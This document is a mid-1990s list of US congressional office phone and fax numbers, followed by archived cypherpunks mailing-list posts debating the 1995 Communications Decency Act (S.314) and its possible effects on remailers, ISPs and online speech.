Zimmer, Richard A. (R-12)          1-202-225-5801 1-202-225-9181
Menendez, Robert (D-13)            1-202-225-7919 1-202-226-0792


NEW MEXICO
Member                             Phone          Fax Number

Sen. Bingaman, Jeff (D)            1-202-224-5521 1-202-224-2852
Sen. Domenici, Pete V. (R)         1-202-224-6621 1-202-224-7371

Schiff, Steven H. (R-01)           1-202-225-6316 1-202-225-4975
Skeen, Joseph (R-02)               1-202-225-2365 1-202-225-9599
Richardson, William (D-03)         1-202-225-6190 1-202-225-1950


NEVADA
Member                             Phone          Fax Number

Sen. Reid, Harry (D)               1-202-224-3542 1-202-224-7327
Sen. Bryan, Richard H. (D)         1-202-224-6244 1-202-224-1867

Ensign, John (R-01)                1-202-225-5965 1-202-225-8808
Vucanovich, Barbara (R-02)         1-202-225-6155 1-202-225-2319


NEW YORK
Member                             Phone          Fax Number

Sen. D'Amato, Alfonse M. (R)       1-202-224-6542 1-202-224-5871
Sen. Moynihan, Daniel P. (D)       1-202-224-4451 1-202-224-9293

Forbes, Michael (R-01)             1-202-225-3826 1-202-225-0776
Lazio, Rick A. (R-02)              1-202-225-3335 1-202-225-4669
King, Peter T. (R-03)              1-202-225-7896 1-202-226-2279
Frisa, Daniel (R-04)               1-202-225-5516 1-202-225-4672
Ackerman, Gary L. (D-05)           1-202-225-2601 1-202-225-1589
Flake, Floyd H. (D-06)             1-202-225-3461 1-202-226-4169
Manton, Thomas J. (D-07)           1-202-225-3965 1-202-225-1909
Nadler, Jerrold (D-08)             1-202-225-5635 1-202-225-6923
Schumer, Charles E. (D-09)         1-202-225-6616 1-202-225-4183
Towns, Edolphus (D-10)             1-202-225-5936 1-202-225-1018
Owens, Major R. (D-11)             1-202-225-6231 1-202-226-0112
Velazquez, Nydia M. (D-12)         1-202-225-2361 1-202-226-0327
Molinari, Susan (R-13)             1-202-225-3371 1-202-226-1272
Maloney, Carolyn B. (D-14)         1-202-225-7944 1-202-225-4709
Rangel, Charles B. (D-15)          1-202-225-4365 1-202-225-0816
Serrano, Jose E. (D-16)            1-202-225-4361 1-202-225-6001
Engel, Eliot L. (D-17)             1-202-225-2464 1-202-225-5513
Lowey, Nita M. (D-18)              1-202-225-6506 1-202-225-0546
Kelly, Sue (R-19)                  1-202-225-5441 1-202-225-0962
Gilman, Benjamin A. (R-20)         1-202-225-3776 1-202-225-2541
McNulty, Michael R. (D-21)         1-202-225-5076 1-202-225-5077
Solomon, Gerald B. (R-22)          1-202-225-5614 1-202-225-1168
Boehlert, Sherwood (R-23)          1-202-225-3665 1-202-225-1891
McHugh, John M. (R-24)             1-202-225-4611 1-202-226-0621
Walsh, James T. (R-25)             1-202-225-3701 1-202-225-4042
Hinchey, Maurice D. (D-26)         1-202-225-6335 1-202-226-0774
Paxon, Bill (R-27)                 1-202-225-5265 1-202-225-5910
Slaughter, Louise M. (D-28)        1-202-225-3615 1-202-225-7822
LaFalce, John J. (D-29)            1-202-225-3231 1-202-225-8693
Quinn, Jack (R-30)                 1-202-225-3306 1-202-226-0347
Houghton, Amory (R-31)             1-202-225-3161 1-202-225-5574


OHIO
Member                             Phone          Fax Number

Sen. DeWine, Mike (R)              1-202-224-2315 1-202-224-6519
Sen. Glenn, John (D)               1-202-224-3353 1-202-224-7983

Chabot, Steve (R-01)               1-202-225-2216 1-202-225-4732
Portman, Rob (R-02)
Hall, Tony P. (D-03)               1-202-225-6465 1-202-225-6766
Oxley, Michael G. (R-04)           1-202-225-2676 1-202-226-1160
Gillmor, Paul E. (R-05)            1-202-225-6405 1-202-225-1985
Cremeans, Frank (R-06)             1-202-225-5705 1-202-226-0331
Hobson, David L. (R-07)            1-202-225-4324 1-202-225-1984
Boehner, John Andrew (R-08)        1-202-225-6205 1-202-225-0704
Kaptur, Marcy (D-09)               1-202-225-4146 1-202-225-7711
Hoke, Martin R. (R-10)             1-202-225-5871 1-202-226-0994
Stokes, Louis (D-11)               1-202-225-7032 1-202-225-1339
Kasich, John R. (R-12)             1-202-225-5355
Brown, Sherrod (D-13)              1-202-225-3401 1-202-225-2266
Sawyer, Thomas C. (D-14)           1-202-225-5231 1-202-225-5278
Pryce, Deborah (R-15)              1-202-225-2015 1-202-226-0986
Regula, Ralph (R-16)               1-202-225-3876 1-202-225-3059
Traficant Jr., James (D-17)        1-202-225-5261 1-202-225-3719
Ney, Bob (R-18)                    1-202-225-6265 1-202-225-9065
LaTourette, Steve (R-19)           1-202-225-5731 1-202-225-9114


OKLAHOMA
Member                             Phone          Fax Number

Sen. Inhofe, James (R)             1-202-224-4721
Sen. Nickles, Donald (R)           1-202-224-5754 1-202-224-6008

Largent, Steve (R-01)              1-202-225-2211 1-202-225-9187
Coburn, Tom (R-02)                 1-202-225-2701 1-202-225-2796
Brewster, Billy Kent (D-03)        1-202-225-4565 1-202-225-9029
Watts, J.C. (R-04)                 1-202-225-6165 1-202-225-9746
Istook, Ernest Jim (R-05)          1-202-225-2132 1-202-226-1463
Lucas, Frank (R-06)                1-202-225-5565 1-202-225-8698


OREGON
Member                             Phone          Fax Number

Sen. Packwood, Bob (R)             1-202-224-5244 1-202-228-3576
Sen. Hatfield, Mark O. (R)         1-202-224-3753 1-202-224-0276

Furse, Elizabeth (D-01)            1-202-225-0855 1-202-225-9497
Cooley, Wes (R-02)                 1-202-225-6730 1-202-225-3129
Wyden, Ronald (D-03)               1-202-225-4811 1-202-225-8941
DeFazio, Peter A. (D-04)           1-202-225-6416 1-202-225-0694
Webber, Catherine (D-05)           1-202-225-5711 1-202-225-9477


PENNSYLVANIA
Member                             Phone          Fax Number

Sen. Specter, Arlen (R)            1-202-224-4254 1-202-224-1893
Sen. Santorum, Rick (R)            1-202-224-6324 1-202-224-4161

Foglietta, Thomas M. (D-01)        1-202-225-4731 1-202-225-0088
Fattah, Chaka (D-02)               1-202-225-4001 1-202-225-7362
Borski, Robert A. (D-03)           1-202-225-8251 1-202-225-4628
Klink, Ron (D-04)                  1-202-225-2565 1-202-226-2274
Clinger Jr., William (R-05)        1-202-225-5121 1-202-225-4681
Holden, Tim (D-06)                 1-202-225-5546 1-202-226-0996
Weldon, Curt (R-07)                1-202-225-2011 1-202-225-8137
Greenwood, Jim (R-08)              1-202-225-4276 1-202-225-9511
Shuster, Bud (R-09)                1-202-225-2431 1-202-225-2486
McDade, Joseph M. (R-10)           1-202-225-3731 1-202-225-9594
Kanjorski, Paul E. (D-11)          1-202-225-6511 1-202-225-9024
Murtha, John P. (D-12)             1-202-225-2065 1-202-225-5709
Fox, Jon (R-13)                    1-202-225-6111 1-202-226-0798
Coyne, William J. (D-14)           1-202-225-2301 1-202-225-1844
McHale, Paul (D-15)                1-202-225-6411 1-202-225-5320
Walker, Robert S. (R-16)           1-202-225-2411 1-202-225-2484
Gekas, George W. (R-17)            1-202-225-4315 1-202-225-8440
Doyle, Michael (D-18)              1-202-225-2135 1-202-225-7747
Goodling, William F. (R-19)        1-202-225-5836 1-202-226-1000
Mascara, Frank (D-20)              1-202-225-4665 1-202-225-4772
English, Philip (R-21)             1-202-225-5406 1-202-225-1081


PUERTO RICO
Member                             Phone          Fax Number

Del. Romero-Barcelo, Carlos (D-AL) 1-202-225-2615 1-202-225-2154


RHODE ISLAND
Member                             Phone          Fax Number

Sen. Pell, Claiborne (D)           1-202-224-4642 1-202-224-4680
Sen. Chafee, John H. (R)           1-202-224-2921

Kennedy, Patrick (D-01)            1-202-225-4911 1-202-225-4417
Reed, John F. (D-02)               1-202-225-2735 1-202-225-9580


AMERICAN SAMOA
Member                             Phone          Fax Number

Del. Faleomavaega, Eni F.H. (D-AL) 1-202-225-8577 1-202-225-8757


SOUTH CAROLINA
Member                             Phone          Fax Number

Sen. Hollings, Ernest F. (D)       1-202-224-6121 1-202-224-4293
Sen. Thurmond, Strom (R)           1-202-224-5972 1-202-224-1300

Sanford, Mark (R-01)               1-202-225-3176 1-202-225-4340
Spence, Floyd (R-02)               1-202-225-2452 1-202-225-2455
Graham, Lindsey (R-03)             1-202-225-5301 1-202-225-5383
Inglis, Bob (R-04)                 1-202-225-6030 1-202-226-1177
Spratt Jr., John M. (D-05)         1-202-225-5501 1-202-225-0464
Clyburn, James E. (D-06)           1-202-225-3315 1-202-225-2302


SOUTH DAKOTA
Member                             Phone          Fax Number

Sen. Pressler, Larry (R)           1-202-224-5842 1-202-224-1630
Sen. Daschle, Thomas A. (D)        1-202-224-2321 1-202-224-2047

Johnson, Timothy P. (D-AL)         1-202-225-2801 1-202-225-2427


TENNESSEE
Member                             Phone          Fax Number

Sen. Thompson, Fred (R)            1-202-224-1036 1-202-228-3679
Sen. Frist, Bill (R)               1-202-224-3344 1-202-224-8062

Quillen, James H. (R-01)           1-202-225-6356 1-202-225-7812
Duncan Jr., John J. (R-02)         1-202-225-5435 1-202-225-6440
Wamp, Zach (R-03)                  1-202-225-3271 1-202-225-6974
Hilleary, Van (R-04)               1-202-225-6831 1-202-225-4520
Clement, Robert (D-05)             1-202-225-4311 1-202-226-1035
Gordon, Bart (D-06)                1-202-225-4231 1-202-225-6887
Bryant, Ed (R-07)                  1-202-225-2811 1-202-225-2814
Tanner, John S. (D-08)             1-202-225-4714 1-202-225-1765
Ford, Harold E. (D-09)             1-202-225-3265 1-202-225-9215


TEXAS
Member                             Phone          Fax Number

Sen. Hutchison, Kay Bailey (R)     1-202-224-5922 1-202-224-0776
Sen. Gramm, Phil (R)               1-202-224-2934 1-202-228-2856

Chapman, Jim (D-01)                1-202-225-3035 1-202-225-7265
Wilson, Charles (D-02)             1-202-225-2401 1-202-225-1764
Johnson, Sam (R-03)                1-202-225-4201 1-202-225-1485
Hall, Ralph M. (D-04)              1-202-225-6673 1-202-225-3332
Bryant, John (D-05)                1-202-225-2231 1-202-225-9721
Barton, Joseph (R-06)              1-202-225-2002 1-202-225-3052
Archer, William (R-07)             1-202-225-2571 1-202-225-4381
Fields, Jack (R-08)                1-202-225-4901 1-202-225-2772
Stockman, Steve (R-09)             1-202-225-6565 1-202-225-1584
Doggett, Lloyd (D-10)              1-202-225-4865 1-202-225-3018
Edwards, Chet (D-11)               1-202-225-6105 1-202-225-0350
Geren, Peter (D-12)                1-202-225-5071 1-202-225-2786
Thornberry, William (R-13)         1-202-225-3706 1-202-225-6142
Laughlin, Gregory H. (D-14)        1-202-225-2831 1-202-225-1108
de la Garza, E. Kika (D-15)        1-202-225-2531 1-202-225-2534
Coleman, Ronald D. (D-16)          1-202-225-4831
Stenholm, Charles W. (D-17)        1-202-225-6605 1-202-225-2234
Lee, Sheila (D-18)                 1-202-225-3816 1-202-225-6186
Combest, Larry (R-19)              1-202-225-4005 1-202-225-9615
Gonzalez, Henry B. (D-20)          1-202-225-3236 1-202-225-1915
Smith, Lamar S. (R-21)             1-202-225-4236 1-202-225-8628
DeLay, Thomas (R-22)               1-202-225-5951 1-202-225-5241
Bonilla, Henry (R-23)              1-202-225-4511 1-202-225-2237
Frost, Martin (D-24)               1-202-225-3605 1-202-225-4951
Bentsen, Ken (D-25)                1-202-255-7508 1-202-225-4210
Armey, Richard K. (R-26)           1-202-225-7772 1-202-225-7614
Ortiz, Solomon P. (D-27)           1-202-225-7742 1-202-226-1134
Tejeda, Frank (D-28)               1-202-225-1640 1-202-225-1641
Green, Gene (D-29)                 1-202-225-1688 1-202-225-9903
Johnson, Eddie Bernice (D-30)      1-202-225-8885 1-202-226-1477


UTAH
Member                             Phone          Fax Number

Sen. Hatch, Orrin G. (R)           1-202-224-5251 1-202-224-6331
Sen. Bennett, Robert (R)           1-202-224-5444 1-202-224-6717

Hansen, James V. (R-01)            1-202-225-0453 1-202-225-5857
Waldholtz, Enid (R-02)             1-202-225-3011 1-202-226-0354
Orton, William H. (D-03)           1-202-225-7751 1-202-226-1223


VIRGINIA
Member                             Phone          Fax Number

Sen. Robb, Charles S. (D)          1-202-224-4024 1-202-224-8689
Sen. Warner, John W. (R)           1-202-224-2023 1-202-224-6295

Bateman, Herbert H. (R-01)         1-202-225-4261 1-202-225-4382
Pickett, Owen B. (D-02)            1-202-225-4215 1-202-225-4218
Scott, Robert C. (D-03)            1-202-225-8351 1-202-225-3854
Sisisky, Norman (D-04)             1-202-225-6365 1-202-226-1170
Payne Jr., Lewis F. (D-05)         1-202-225-4711 1-202-226-1147
Goodlatte, Robert W. (R-06)        1-202-225-5431 1-202-225-9681
Bliley Jr., Thomas J. (R-07)       1-202-225-2815 1-202-225-0011
Moran Jr., James P. (D-08)         1-202-225-4376 1-202-225-0017
Boucher, Rick (D-09)               1-202-225-3861 1-202-225-0442
Wolf, Frank R. (R-10)              1-202-225-5136 1-202-225-0437
Davis III, Thomas (R-11)           1-202-225-1492 1-202-225-2274


VIRGIN ISLANDS
Member                             Phone          Fax Number

Del. de Lugo, Ron (D-AL)           1-202-225-1790 1-202-225-9392


VERMONT
Member                             Phone          Fax Number

Sen. Jeffords, James M. (R)        1-202-224-5141 1-202-224-8330
Sen. Leahy, Patrick J. (D)         1-202-224-4242 1-202-224-3595

Sanders, Bernard (I-AL)            1-202-225-4115 1-202-225-6790


WASHINGTON
Member                             Phone          Fax Number

Sen. Murray, Patty (D)             1-202-224-2621 1-202-224-0238
Sen. Gorton, Slade (R)             1-202-224-3441 1-202-224-9393

White, Rick (R-01)                 1-202-225-6311 1-202-225-2286
Metcalf, Jack (R-02)               1-202-225-2605 1-202-225-2608
Smith, Linda (R-03)                1-202-225-3536 1-202-225-9095
Hastings, Dee (R-04)               1-202-225-5816 1-202-226-1137
Nethercutt, George (R-05)          1-202-225-2006 1-202-225-7181
Dicks, Norman D. (D-06)            1-202-225-5916 1-202-226-1176
McDermott, James A. (D-07)         1-202-225-3106 1-202-225-9212
Dunn, Jennifer (R-08)              1-202-225-7761 1-202-225-8673
Tate, Randy (R-09)                 1-202-225-8901 1-202-226-2361


WISCONSIN
Member                             Phone          Fax Number

Sen. Kohl, Herbert H. (D)          1-202-224-5653 1-202-224-9787
Sen. Feingold, Russell (D)         1-202-224-5323 1-202-224-2725

Neumann, Mark (R-01)
Klug, Scott (R-02)                 1-202-225-2906 1-202-225-6942
Gunderson, Steve (D-03)            1-202-225-5506 1-202-225-6195
Kleczka, Gerald D. (D-04)          1-202-225-4572 1-202-225-8135
Barrett, Thomas M. (D-05)          1-202-225-3571 1-202-225-2185
Petri, Thomas E. (R-06)            1-202-225-2476 1-202-225-2356
Obey, David R. (D-07)              1-202-225-3365 1-202-225-0561
Roth, Toby (R-08)                  1-202-225-5665 1-202-225-0087
Sensenbrenner, F. James (R-09)     1-202-225-5101 1-202-225-3190


WEST VIRGINIA
Member                             Phone          Fax Number

Sen. Rockefeller, John D. (D)      1-202-224-6472 1-202-224-1689
Sen. Byrd, Robert C. (D)           1-202-224-3954 1-202-224-4025

Mollohan, Alan B. (D-01)           1-202-225-4172 1-202-225-7564
Wise Jr., Robert E. (D-02)         1-202-225-2711 1-202-225-7856
Rahall II, Nick Joe (D-03)         1-202-225-3452 1-202-225-9061


WYOMING
Member                             Phone          Fax Number

Sen. Simpson, Alan K. (R)          1-202-224-3424 1-202-224-1315
Sen. Thomas, Craig (R)             1-202-224-6441 1-202-224-3230

Cubin, Barbara (R-AL)              1-202-225-2311 1-202-225-0726




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 22:41:32 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: S.314, the "Pi Bill"
In-Reply-To: <199502080547.VAA28367@netcom11.netcom.com>
Message-ID: <Pine.SV4.3.91.950208002952.25082A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, Timothy C. May wrote:

> Brad Huntting wrote:
> 
> > Can anyone confirm this S.314 thing?  It sounds an awful lot like
> > the "modem tax" and other urban legends.
> > 
> > 
> 
> I wrote a post to comp.org.eff.talk in which I asked if "S.314" isn't
> just the "Pi Bill," in which pi = 3.14 is mandated to be pi = 3.00.
> 
> S.314 I initially, for a minute or so, thought to be a put-on, a
> spoof. But the text lacked other signs of humor and had the trappings
> of a real bill. And then versions from reputable groups began to
> appear, so I was of course convinced it was real.
> 
> If it's a spoof, it's too cute by half.
> 
> --Tim May

I too thought it was a spoof initially. Hell, what Senator would be dumb 
enough to name a bill this way if it was real? If I were trying to pass a 
bill of this nature, it would be double-speak all of the way. But alas it 
is true... And I thought the DT bill was bad. 

Both of my congresscritters have been faxed and queried as to their 
position. I'll inform the group when they fax me back. I would urge 
others to do this. This will be unbelievably bad if we lose this one. 
The ramifications on this bill are still hammering me in the head.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 23:07:13 PST
To: cypherpunks@toad.com
Subject: Full text of S. 314
Message-ID: <Pine.SV4.3.91.950208010437.25409A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 23:24:13 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080649.BAA02589@ducie.cs.umass.edu>
Message-ID: <Pine.SV4.3.91.950208011435.25409B-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 8 Feb 1995, L. McCarthy wrote:

> The battle over "obscenity" has been fought long and hard.
> 
> "Indecency" seems a remarkably nebulous term (and, of course, ludicrously
> Victorian). I'd be interested in seeing a legal definition, and alarmed if
> there isn't one (yet).

Last I heard, the Supreme Court had never made a ruling on this. They 
copped out and left it up to "Community Standards." This is partially why 
the AA bbs case was successfully prosecuted in another state.

> Don't even get me started on the "nudity" portion. I'm sure Jesse Helms is
> already licking his lips over this one.

Under the new legislation, might this not be illegal? ;)

On another note, I mailed Stanton McCandlish to find out what EFF's 
position is on this. I tried browsing their archives, but lots of stuff 
seems to have vanished from there.

Sam








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 23:34:23 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080649.BAA02589@ducie.cs.umass.edu>
Message-ID: <Pine.SV4.3.91.950208012852.25409C-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 8 Feb 1995, L. McCarthy wrote:

> 
> BTW, what sort of "digital communication" is neither "wire communication" nor
> "electronic communication" ?

If I stick my middle finger up at you, isn't that non-electronic digital 
communication? (Injected for comic relief on a VERY serious topic. No 
flames please.)

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 7 Feb 95 22:47:49 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <v03001400ab5e06968201@[140.174.229.225]>
Message-ID: <199502080649.BAA02589@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[As always, IANAL. This citizen likes to think he has a reasonable capability
and obligation to assess the laws to which he may be subjected, though.]

After perusing it a couple of times, I'm still not sure I understand why the
specific provisions of the CDA would provoke the extreme monitoring measures
mentioned here. I agree with Sam that it's rather odd that EPIC hasn't put it
on their list of privacy-related bills in the 104th Congress. 

As a start, I'll try to speculate on sore points and their possible
immediate implications. 

+ "This Act may be cited as the `Communications Decency Act of 1995'."

Who elected Miss Manners to Congress ?  Any bill with `decency' in its title
deserves to die in committee, IMNSHO.

+ SEC. 2. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER THE 
+ COMMUNICATIONS ACT OF 1934.
[...]
+ (B) by striking out `makes any comment, request, suggestion, or
+         proposal' in subparagraph (A) and inserting `makes, transmits, or
+         otherwise makes available any comment, request, suggestion, proposal,
+         image, or other communication';

I take this section to be extending the ban on harassing phone calls and such
to cover all forms of electronic communication. I'm further assuming that the
subparagraph (A) mentioned above attempts to enumerate possible linguistic and
technical means of conveying the harassing content. What disturbs me is the
phrase "or otherwise makes available". I'm reminded of the arrest in Florida
a few years back of a couple whose lovemaking had been witnessed through their
bedroom window by a neighbor's curious child. My lay understanding of this
language is that passively presented information, such as the contents of a
WWW page or .plan file, could be construed as illegally obscene or harassing
under this act.

+ SEC. 5. INTERCEPTION AND DISCLOSURE OF ELECTRONIC COMMUNICATIONS.
+ Section 2511 of title 18, United States Code, is amended--
[...]
+ (A) by striking `wire, oral, or electronic communication' each place it
+         appears and inserting `wire, oral, electronic, or digital
+         communication', and

Is this the crucial threatening passage ?  Adding electronic communication to
a list presumably subject to "interception and disclosure" sounds ominous.
Without seeing the original legislation, though, I can't tell whether this
totally overturns the ECPA and similar statutes, or does something less 
drastic.

BTW, what sort of "digital communication" is neither "wire communication" nor
"electronic communication" ?

+ SEC. 8. CABLE OPERATOR REFUSAL TO CARRY CERTAIN PROGRAMS.
[...]
+ `, except a cable operator may refuse to transmit
+   any public access program or portion of a public access program which
+   contains obscenity, indecency, or nudity'
[...]
+ `a cable operator may refuse to transmit any leased
+   access program or portion of a leased access program which contains
+   obscenity, indecency, or nudity.

The battle over "obscenity" has been fought long and hard.

"Indecency" seems a remarkably nebulous term (and, of course, ludicrously
Victorian). I'd be interested in seeing a legal definition, and alarmed if
there isn't one (yet).

Don't even get me started on the "nudity" portion. I'm sure Jesse Helms is
already licking his lips over this one.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Wed, 8 Feb 95 00:19:05 PST
To: cypherpunks@toad.com
Subject: Re: URGENT - What S.314 Would Do
In-Reply-To: <3h81qs$ee0@dockmaster.phantom.com>
Message-ID: <Pine.SV4.3.91.950208020311.25943A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On 7 Feb 1995, slowdog wrote:

>    Whoever -
>    
>    (1) in the District of Columbia or in interstate or foreign
>    communication by means of [telephone] telecommunications
>    device -
>    
>    (A) [makes any comment, request, suggestion or proposal] 
>    makes, transmits, or otherwise makes available any comment,
>    request, suggestions, proposal, image, or other communication]
>    which is obscene, lewd, lascivious, filthy, or indecent;

Ding...Ding...Ding... We have a winner here. Goodbye binaries and sex groups.
Please note the "whoever" at the top of the paragraph. No "knowingly." 
The question is: "Is obscene speech protected speech? Does this negate 
the First Amendment?"

> 
>    (B) [makes a telephone call, whether or not conversation
>    ensues, without disclosing his identity and with intent to
>    annoy, abuse, threaten, or harass any person at the called
>    number] makes a telephone call or utilizes a telecommunications
>    device, whether or not conversation or communications ensues,
>    without disclosing his identity with intent to annoy, abuse,
>    threaten, or harass any person at the called number or who
>    receives the communication;

Ding...Ding...Ding... We have another winner. Goodbye remailers. Probably 
90% of remailer traffic violates this one. Well boys and girls we'd 
better get lots more offshore...soon.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Wed, 8 Feb 95 00:26:37 PST
To: cypherpunks@toad.com
Subject: Re: Full text of S. 314
In-Reply-To: <Pine.SV4.3.91.950208010437.25409A-100000@mirage.skypoint.com>
Message-ID: <Pine.SV4.3.91.950208022428.26104C@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


I would suggest that everyone forward this to their ISP. It has a direct 
bearing on them and most won't be aware of it.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Wed, 8 Feb 95 00:14:53 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080649.BAA02589@ducie.cs.umass.edu>
Message-ID: <Pine.BSI.3.91.950208031553.29206A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain


> BTW, what sort of "digital communication" is neither "wire communication" nor
> "electronic communication" ?

Depending on how you take the word "digital", flipping someone off?  :)

/****************************************************************************
* Anthony Ortenzi * ortenzi@interactive.net * ortenzi@vivarin.pc.cc.cmu.edu *
*---------------------------------------------------------------------------*
*                 * http://www.interactive.net/~ortenzi/ *                  *
****************************************************************************/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Wed, 8 Feb 95 02:03:07 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080946.EAA01638@libws2.ic.sunysb.edu>
Message-ID: <Pine.SV4.3.91.950208035054.26559A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 8 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> > Last I heard, the Supreme Court had never made a ruling on this. They 
> > copped out and left it up to "Community Standards." This is partially why 
> > the AA bbs case was successfully prosecuted in another state.
> 
> I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
> v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't
> say on television" skit and was taken to court. The court ruled that there
> were some obscene things which could be censored, but other things were
> indecent so could at most be relegated to late night hours (and they've
> struck down laws banning indecency 24 hours... I think some stations are
> suing with the claim that such relegation constitutes censorship).
> 
> Don't remember their exact formulation, which isn't very exact anyway.
> 

The question is: What is obscene? What the community in NYC considers 
obscene is sure a lot different than what the community in Elk River 
Minnesota considers obscene. (They've been trying to eject their one XXX 
bookstore for years now while NYC has the American Museum of Pornography 
at 42nd Street ;) ;) :) ) As you can see, obscenity depends where you are 
geographically located, at least according to our highest court. If 
community standards say it is obscene then it is. They never legally 
defined what constitutes something as being obscene or an obscenity.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 8 Feb 95 01:46:56 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SV4.3.91.950208011435.25409B-100000@mirage.skypoint.com>
Message-ID: <199502080946.EAA01638@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> On Wed, 8 Feb 1995, L. McCarthy wrote:
> 
> > The battle over "obscenity" has been fought long and hard.
> > 
> > "Indecency" seems a remarkably nebulous term (and, of course, ludicrously
> > Victorian). I'd be interested in seeing a legal definition, and alarmed if
> > there isn't one (yet).
> 
> Last I heard, the Supreme Court had never made a ruling on this. They 
> copped out and left it up to "Community Standards." This is partially why 
> the AA bbs case was successfully prosecuted in another state.

I beg to differ. Remember the "Seven Dirty Words Case"? (I think WBAI/Pacifica
v. US, year?...). WBAI-FM in NY played George Carlin's "Seven words you can't
say on television" skit and was taken to court. The court ruled that there
were some obscene things which could be censored, but other things were
indecent so could at most be relegated to late night hours (and they've
struck down laws banning indecency 24 hours... I think some stations are
suing with the claim that such relegation constitutes censorship).

Don't remember their exact formulation, which isn't very exact anyway.

> > Don't even get me started on the "nudity" portion. I'm sure Jesse Helms is
> > already licking his lips over this one.
> 
> Under the new legislation, might this not be illegal? ;)
> 
> On another note, I mailed Stanton McCandlish to find out what EFF's 
> position is on this. I tried browsing their archives, but lots of stuff 
> seems to have vanished from there.

Perhaps it was deemed too indecent to be on an archive site. Hell, they
cooperated plenty with the government on this.

It's a sad day when you might expect AT&T to stand up for your rights more
than the EFF...

> 
> Sam

Just my opinions,
  Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 8 Feb 95 06:20:39 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
In-Reply-To: <Chameleon.4.01.950207225342.jcorgan@comet.aeinet.com>
Message-ID: <199502081418.GAA23140@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Johnathan Corgan <jcorgan@aeinet.com>

   One of the lessons learned in the years-long debate between the
   telco folks pushing synchronous time-division multiplexing point to
   point circuit switches and the data folks pushing variable length
   packet-switched broadcast medium networks is that fixed length
   packets can give you both TDM and statistical multiplexing.

There's an important difference here.  Namely, the telco/ATM folks
were building hardware from scratch and we're not.  We're layering on
top of an existing Internet routing environment.

This doesn't mean that your point is wrong, but that it may no longer
be true when the base layer is IP.  I'm not familiar enough with the
ATM arguments to know whether they're still valid in this other
domain.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 8 Feb 95 06:37:28 PST
To: cypherpunks@toad.com
Subject: WSJ Article on Sen. Exon's Legislation
Message-ID: <199502081435.GAA06488@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Government Tackles a Surge of Smut on the Internet"
Wall Street Journal
Wednesday, February 8, 1995 
page B1

----------Begin Quote----------

  Instead, the services would prefer to be treated like phone companies, 
which claim no responsibility for telephone conversations. With millions 
of messages passing through each day, the services say they couldn't possibly 
monitor everything even if they tried.
  Sen. Exon is unconvinced. "If I were against this <the legislation>, 
if I didn't want to be bothered with it, if I felt it might complicate 
my ability to make money on the superhighway, that's the argument I 
would make," he says, adding that a failure by the government to act 
would be "an open invitation to some of the hardcore pornography getting 
into our homes."

-----------End Quote-----------


Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
